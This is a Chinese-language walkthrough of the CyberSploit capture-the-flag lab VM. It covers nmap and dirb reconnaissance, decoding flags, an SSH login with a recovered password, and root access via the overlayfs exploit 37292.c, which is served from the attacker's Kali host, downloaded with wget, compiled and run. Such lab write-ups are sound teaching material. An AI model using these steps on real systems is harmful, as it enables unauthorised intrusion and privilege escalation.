靶机准备

将ova文件导入虚拟机中,设置网络模式为NAT

从靶机描述得知包含3个flag





kali扫描其ip

netdiscover -r 192.168.164.0/24

渗透测试

namp扫描端口

nmap -sS -sV -T5 -A -p- 192.168.164.187



只开放了22、80端口

访问80端口



查看源码,发现信息



扫描一下目录

dirb http://192.168.164.187



发现robots.txt,访问



得到一串密文,尝试base64解码

成功获得flag1



接下来尝试ssh连接

利用刚才获得的username进行尝试猜测密码为flag1:

cybersploit{youtube.com/c/cybersploit}

成功登录



不是root权限



查看一下目录,发现flag2,读取



得到一串二进制数据,可能有用

01100111 01101111 01101111 01100100 00100000 01110111 01101111 01110010 01101011 00100000 00100001 00001010 01100110 01101100 01100001 01100111 00110010 00111010 00100000 01100011 01111001 01100010 01100101 01110010 01110011 01110000 01101100 01101111 01101001 01110100 01111011 01101000 01110100 01110100 01110000 01110011 00111010 01110100 00101110 01101101 01100101 00101111 01100011 01111001 01100010 01100101 01110010 01110011 01110000 01101100 01101111 01101001 01110100 00110001 01111101

使用工具将二进制转文本,获得flag2

提权

先查看系统内核版本

uname -a



是3.13.0-32-generic

查找是否有漏洞

searchsploit overlayfs



下载37292.c文件

cp /usr/share/exploitdb/exploits/linux/local/37292.c /root



在kali开启http服务,靶机下载此文件。

python -m SimpleHTTPServer 8080

靶机:wget http://192.168.164.137:8080/37292.c



gcc编译命令:

gcc 37292.c -o test

执行脚本文件:

./test

提权成功,得到root权限!!!



进入root目录拿到最后一个flag3

cybersploit的更多相关文章

随机推荐

  1. C# 计算文件的MD5

    MD5的作用详见:https://baike.baidu.com/item/MD5/212708?fr=aladdin public static string GetFileMD5(string f ...

  2. [转]VRRP协议详解

    原文地址:VRRP协议详解 文中涉及缩略语 缩略语 英文全名 中文解释 VRRP Virtual Router Redundancy Protocol 虚拟路由器冗余协议 NQA Network Qu ...

  3. SpringBoot应用中使用AOP记录接口访问日志

    SpringBoot应用中使用AOP记录接口访问日志 本文主要讲述AOP在mall项目中的应用,通过在controller层建一个切面来实现接口访问的统一日志记录. AOP AOP为Aspect Or ...

  4. 【Python机器学习实战】决策树与集成学习(四)——集成学习(2)GBDT

    本打算将GBDT和XGBoost放在一起,但由于涉及内容较多,且两个都是比较重要的算法,这里主要先看GBDT算法,XGBoost是GBDT算法的优化和变种,等熟悉GBDT后再去理解XGBoost就会容 ...

  5. Pulsar の 保证消息的顺序性、幂等性和可靠性

    原文链接:Pulsar の 保证消息的顺序性.幂等性和可靠性 一.背景 前面两篇文章,已经介绍了关于Pulsar消费者的详细使用和自研的Pulsar组件. 接下来,将简单分析如何保证消息的顺序性.幂等 ...

  6. vue 引入 echarts 图表 并且展示柱状图

    npm i echarts -S 下载 echarts 图表 mian.js 文件 引入图表并且全局挂载 //echarts 图表 import echarts from 'echarts' Vue. ...

  7. Spring BeanDefinition

    定义 /** * A BeanDefinition describes a bean instance, which has property values, * constructor argume ...

  8. Spring系列之不同数据库异常如何抽象的?

    前言 使用Spring-Jdbc的情况下,在有些场景中,我们需要根据数据库报的异常类型的不同,来编写我们的业务代码.比如说,我们有这样一段逻辑,如果我们新插入的记录,存在唯一约束冲突,就会返回给客户端 ...

  9. Kubernetes 持久化数据存储 StorageClass

    文章链接 PV 和 PVC 模式要先创建好 PV,然后再定义好 PVC 进行一对一的绑定.那么如果遇到大集群,也一一的创建吗?这样来说维护成本很高,工作量大.这个时候就有了 Kubernetes 提供 ...

  10. HCNP Routing&Switching之动态路由协议IS-IS基础

    前文我们了解了OSPF的特殊区域相关话题,回顾请参考https://www.cnblogs.com/qiuhom-1874/p/15236330.html:今天我们来聊一聊另一动态路由协议IS-IS相 ...